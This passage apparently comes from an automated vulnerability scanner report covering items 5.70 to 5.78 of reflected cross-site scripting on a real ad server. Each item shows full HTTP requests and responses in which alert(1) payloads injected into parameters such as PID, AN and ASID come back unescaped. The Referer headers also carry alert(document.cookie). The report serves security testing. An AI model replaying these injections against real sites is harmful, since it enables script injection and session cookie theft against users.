Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
c="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398946**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!77ac7"-alert(1)-"d6a67b2bc13&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ee5"-alert(1)-"465aa420697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&c2ee5"-alert(1)-"465aa420697=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&c2ee5"-alert(1)-"465aa420697=1">
...[SNIP]...

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ba0'-alert(1)-'847a44efb7d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235d3ba0'-alert(1)-'847a44efb7d&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:20 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:38345:1296398960:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 931

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d3ba0'-alert(1)-'847a44efb7d&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9d3d'-alert(1)-'889a7271f4a was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!e9d3d'-alert(1)-'889a7271f4a&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:06 GMT; path=/
Set-Cookie: i_1=33:1411:836:100:0:38345:1296398946:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 939

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!e9d3d'-alert(1)-'889a7271f4a&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f695'-alert(1)-'979cf30b28 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=11105081375f695'-alert(1)-'979cf30b28&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:15 GMT; path=/
Set-Cookie: i_1=33:1411:782:100:0:38345:1296399015:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 938

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=11105081375f695'-alert(1)-'979cf30b28&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34465'-alert(1)-'c4dc97752cd was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a34465'-alert(1)-'c4dc97752cd HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:33 GMT; path=/
Set-Cookie: i_1=33:1411:46:100:0:38345:1296399033:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 935

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a34465'-alert(1)-'c4dc97752cd';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767be'-alert(1)-'2fd933b06e7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD767be'-alert(1)-'2fd933b06e7&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:24 GMT; path=/
Set-Cookie: i_1=33:1411:46:100:0:38345:1296399024:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 935

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD767be'-alert(1)-'2fd933b06e7&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e395'-alert(1)-'48483e8fdb0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=82312089e395'-alert(1)-'48483e8fdb0&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:07 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:38345:1296399007:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 941

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=82312089e395'-alert(1)-'48483e8fdb0&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {

...[SNIP]...

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62a7d'-alert(1)-'51e6f106d3a was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G62a7d'-alert(1)-'51e6f106d3a&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:52 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:38345:1296398992:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:52 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 931

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G62a7d'-alert(1)-'51e6f106d3a&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d4b3'-alert(1)-'9d3d9a4f116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&9d4b3'-alert(1)-'9d3d9a4f116=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:23 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:38345:1296399083:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:51:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 944

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&9d4b3'-alert(1)-'9d3d9a4f116=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

